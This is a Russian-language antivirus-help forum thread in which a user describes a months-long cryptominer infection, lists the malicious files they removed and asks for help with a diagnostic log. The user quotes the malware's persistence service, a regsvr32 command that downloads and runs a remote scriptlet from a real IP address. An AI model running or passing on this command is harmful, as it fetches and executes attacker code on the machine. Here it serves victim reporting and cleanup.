Перейти к содержанию

Поймал вирус (предположительно майнер)


Igo108

Рекомендуемые сообщения

Здравствуйте. Антивирус в системе не стоит, т.к. слабенькая.
На винчестере три раздела и два Windows - XP и Vista. В основном работаю на С: под ХР.
Поймал вирус (предположительно майнер) еще летом 2021 года. Прошло уже больше 3-х месяцев.
Грузит систему периодически до 100%.
Часть вируса удалил в начале осени, но вижу, что не всё. Удалил (возможно не всё перечислил):
a.bat
conhoy.exe
CONHOY.EXE-1EC51B50.pf11
shell.rar
c:\WINDOWS\Debug\item.dat
c:\WINDOWS\inf\aspnet\lsma12.exe
c:\System Volume Information\_restore{6B76C70F-5D28-4A66-9153-CE979AEAF7D5}\RP129\A0091495.INI  62байта
??? c:\WINDOWS\system32\n1.dat

Служба apzZ
C:\WINDOWS\system32\regsvr32.exe
apzZ    12%    apzZ    Auto on startup    Сервер регистрации, (C) Microsoft    Корпорация Майкрософт    cmd /c regsvr32 /s /u /n /i:http://185.47.128.124:8124/m17010.txt scrobj.dll    2021-08-29 14:07    own process    

Trojan.BitCoinMiner.TskLnk, C:\WINDOWS\inf\aspnet\lsma12.exe


В процессе работы над отчетом блокировался доступ к вэб-сайтам антивирусов.
Периодически в текстовых окнах само печатало длинный текст testtest......testtest.txt и также другой текст.
Также зависала система и испортился Malwarebytes.

По теме загрузки отчета есть несколько замечаний. При попытке запустить AutoLogger (скачанный по ссылке из Правил оформления) пишет "Пожалуйста, скачайте свежую версию автосборщика логов". В файле Date.ini из папки AutoLogger\AV поменял вручную дату на более близкую - только тогда AutoLogger запустился. Думаю, нужно в выложенном для скачивания архиве периодически менять дату в файле Date.ini на более актуальную.
И ещё. Базы обновить невозможно, так как пункт обновления в меню Файл не активен.

Буду благодарен за помощь.

тут лог

CollectionLog-2022.01.07-14.36.zip

Ссылка на комментарий
Поделиться на другие сайты

  • thyrex закрыл тема
Гость
Эта тема закрыта для публикации ответов.
  • Похожий контент

    • trambler3
      От trambler3
      1. ОС переустановлена т.к. необходимо рабочее место.
      2. Атака произошла ночью в выходной день через компьютер пользователя. Сервер 1С не смогли зашифровать, только общедоступные папки (шару). Однако на сервере касперский нашел ransomware (к сожалению в панике удалил даже не записав точное название), так же почти на всех пользовательских компах был файл , определяющийся как вирус "AA_v3". При попытке восстановления с помощью, например, recuva видно удаленный файл, но он повреждён. Теневых копий нет. 
      F.7z
    • Мелькор
      От Мелькор
      А вы можете и мне помочь пожалуйста? А то ноуту тяжело, а мне печально от этого((
      Desktop.rar
       
      Сообщение от модератора thyrex Перенесено из темы
    • San4s2034
      От San4s2034
      Недавно скачал Game of Thrones Genesis с torrent-game.net. Касперски указал, что сайту можно доверять и он проверен. По итогу через время заметил, что в valorant фпс стал заблоченным на 75 и поднимается вверх только если я двигаю мышкой или нажимаю что-то на клавиатуре. Очевидно, что словил майнер. Запустил быструю и полную проверку, результата не дало. Попробовал через защитник windows 11. Заметил, что прогресс доходит до ~70% и потом просто зависает. Запустился через безопасный режим, зашёл в защитник и вылезла ошибка(скриншот). Проверил реестр и групповые политики, ничего нет, все чисто. 

    • San4s2034
      От San4s2034
      Недавно скачал Game of Thrones Genesis с torrent-game.net. Касперски указал, что сайту можно доверять и он проверен. По итогу через время заметил, что в valorant фпс стал заблоченным на 75 и поднимается вверх только если я двигаю мышкой или нажимаю что-то на клавиатуре. Очевидно, что словил майнер. Запустил быструю и полную проверку, результата не дало. Попробовал через защитник windows 11. Заметил, что прогресс доходит до ~70% и потом просто зависает. Запустился через безопасный режим, зашёл в защитник и вылезла ошибка(скриншот). Проверил реестр и групповые политики, ничего нет, все чисто. 

    • tkm
      От tkm
      Система стала сильно использовать ресурсы. При проверке антивирусом был обнаружен и обезврежен один файл
      CollectionLog-2025.02.28-12.50.zip
×
×
  • Создать...